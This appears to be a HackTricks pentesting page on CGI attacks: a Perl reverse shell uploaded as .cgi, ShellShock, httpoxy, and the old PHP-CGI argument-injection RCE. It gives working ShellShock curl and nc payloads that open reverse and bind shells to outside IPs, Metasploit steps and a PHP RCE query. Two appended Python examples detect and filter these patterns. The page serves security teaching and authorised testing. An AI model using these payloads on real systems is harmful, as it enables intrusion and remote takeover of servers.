{{#include ../../banners/hacktricks-training.md}}

# Information

**CGI scripts are usually Perl scripts**, so if you have compromised a server that can execute _**.cgi**_ scripts you can **upload a Perl reverse shell** (`/usr/share/webshells/perl/perl-reverse-shell.pl`), **change the extension** from **.pl** to **.cgi**, give it **execute permissions** (`chmod +x`) and **access** the reverse shell **from the web browser** to execute it.

To test for **CGI vulns** it is recommended to use `nikto -C all` (with all the plugins).

# **ShellShock**

**ShellShock** is a **vulnerability** affecting the widely used **Bash** command-line shell in Unix-based operating systems. It targets Bash's ability to run commands passed to it by applications. The vulnerability lies in the handling of **environment variables**, which are dynamic named values that affect how processes run on a computer. Attackers can exploit this by attaching **malicious code** to an environment variable, which is executed when the variable is received. This allows attackers to potentially compromise the system.

While exploiting this vulnerability the **page may throw an error**.

You can **find** this vulnerability by noticing that the server runs an **old Apache version** with **cgi_mod** (with a cgi folder) or by using **nikto**.

## **Test**

Most tests are based on echoing something and expecting that string to be returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
**Nmap**

```bash
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```

## **Curl (reflected, blind and out-of-band)**

```bash
# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh
```

[**Shellshocker**](https://github.com/liamim/shellshocker)

```bash
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```

## Exploit

```bash
#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run
```

# **Proxy (MitM to Web server requests)**

CGI creates an environment variable for each header in the HTTP request. For example, the header "host:web.com" is exposed as "HTTP_HOST"="web.com".

Since the HTTP_PROXY variable may be honoured by the web server's own outbound HTTP client, try sending a **header** containing "**Proxy: <IP_attacker>:<PORT>**". If the server performs any request during the session, you will be able to capture every request made by the server.
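The two risks above (a header value reaching Bash as a function export, and a Proxy header becoming HTTP_PROXY) both come from the same CGI mechanism: every request header is copied into the CGI child's environment. The following added example, which is not HackTricks or Apache code, models that mapping and a hardened variant that drops the Proxy header and refuses Bash-function-shaped values; the function names and `SAMPLE_HEADERS` are constructed for illustration.

```python
"""Model of the CGI header-to-environment mapping described above, next to a
hardened variant.  Added example, not HackTricks or Apache code; the function
names and SAMPLE_HEADERS are constructed for illustration."""
import re

# Per the CGI spec (RFC 3875), each request header "Name: value" becomes the
# environment variable HTTP_NAME with '-' replaced by '_' and upper-cased.
def header_to_env_name(header: str) -> str:
    return "HTTP_" + header.strip().upper().replace("-", "_")

def headers_to_cgi_env(headers: dict) -> dict:
    """Naive mapping: every header value reaches the CGI child's environment.
    This is what lets a 'Proxy' header become HTTP_PROXY (httpoxy) and a value
    starting with '() {' reach a Bash child as an exported function."""
    return {header_to_env_name(k): v for k, v in headers.items()}

# A Bash exported function starts with "() {"; vulnerable Bash kept parsing
# past the function body and executed the trailing commands (ShellShock).
BASH_FUNCTION_EXPORT = re.compile(r"^\s*\(\)\s*\{")

def hardened_headers_to_cgi_env(headers: dict):
    """Return (env, findings).  The Proxy header is dropped so it can never set
    HTTP_PROXY for the server's outbound requests, and values shaped like a
    Bash function export are refused instead of being handed to the child."""
    env, findings = {}, []
    for name, value in headers.items():
        env_name = header_to_env_name(name)
        if env_name == "HTTP_PROXY":
            findings.append(f"dropped header {name!r}: would set HTTP_PROXY={value!r}")
            continue
        if BASH_FUNCTION_EXPORT.match(value):
            findings.append(f"rejected header {name!r}: Bash function export in value")
            continue
        env[env_name] = value
    return env, findings

# Constructed request headers: a ShellShock probe plus an httpoxy-style Proxy header.
SAMPLE_HEADERS = {
    "Host": "web.com",
    "User-Agent": "() { :; }; echo VULNERABLE",
    "Proxy": "203.0.113.5:8080",
    "Accept": "*/*",
}

if __name__ == "__main__":
    print("naive:", headers_to_cgi_env(SAMPLE_HEADERS))
    env, findings = hardened_headers_to_cgi_env(SAMPLE_HEADERS)
    print("hardened:", env)
    for finding in findings:
        print(" -", finding)
```

The real fixes sit below this layer: patching Bash (fixed versions no longer import functions from arbitrary variables) and, for httpoxy on Apache with mod_headers, `RequestHeader unset Proxy early`. The header filter is only a defence-in-depth signal; its `findings` list is also a reasonable thing to log and alert on, since legitimate clients never send either shape.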
# Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Basically, if cgi is active and php is "old" (<5.3.12 / < 5.4.2) you can execute code.
To exploit this vulnerability you need to access some PHP file of the web server without sending parameters (especially without sending the character "=").
Then, to test for this vulnerability, you could access for example `/index.php?-s` (note the `-s`) and **the source code of the application will appear in the response**.

Then, to obtain **RCE** you can send this special query: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` and the **PHP code** to be executed in the **body of the request. Example:**

```bash
curl -i --data-binary "" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
```

**More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**

{{#include ../../banners/hacktricks-training.md}}
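The reason the "=" character matters is the CGI rule (RFC 3875 section 4.4) that a query string containing no "=" is passed to the program as command-line arguments split on "+"; old php-cgi then parsed those as its own options. The following added example, which is not HackTricks code, applies exactly that rule to constructed Apache access-log lines so that `?-s` and `?-d ...` probes can be spotted in logs; note that it tests the raw query for "=" because the `%3d` encoding in the request above decodes to "=" only after the CGI argv split has already happened.

```python
"""Finds requests whose query string old php-cgi would have consumed as
command-line options (the CVE-2012-1823 / CVE-2012-2311 shape described above)
in Apache access-log lines.  Added example, not HackTricks code; SAMPLE_LOG is
constructed and the function names are illustrative."""
import re
from urllib.parse import unquote

# Apache combined-format request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def php_cgi_argv_injection(target: str):
    """Return the decoded argv list if this request target would reach php-cgi
    as command-line arguments, else None.

    RFC 3875 section 4.4: a query string with no '=' is passed to the CGI
    program as argv, split on '+'.  Old php-cgi treated those like its own
    options, so '?-s' dumps source and '?-d ...' sets ini directives.  The '='
    test must look at the raw query: '%3d' keeps the raw string free of '=' and
    only decodes to '=' inside an individual option value."""
    if "?" not in target:
        return None
    raw_query = target.split("?", 1)[1]
    if "=" in raw_query:
        return None                      # normal key=value query: not argv
    args = [unquote(a) for a in raw_query.split("+") if a]
    if args and args[0].startswith("-"):
        return args
    return None

def scan_log(lines):
    """Return [(target, argv)] for every log line matching the injection shape."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        args = php_cgi_argv_injection(m.group("target"))
        if args:
            hits.append((m.group("target"), args))
    return hits

# Constructed access-log lines: a source-disclosure probe, the RCE request from
# the section above, and two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?-s HTTP/1.1" 200 512 "-" "curl/7.88"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 77 "-" "curl/7.88"',
    '198.51.100.3 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for target, argv in scan_log(SAMPLE_LOG):
        print(f"php-cgi argv injection: {target} -> {argv}")
```

The decoded argv of the second hit shows the two `-d` directives that make `php://input` the prepended file, which is the signal worth alerting on; the durable fix is upgrading PHP past the versions named above (or not running PHP via php-cgi at all).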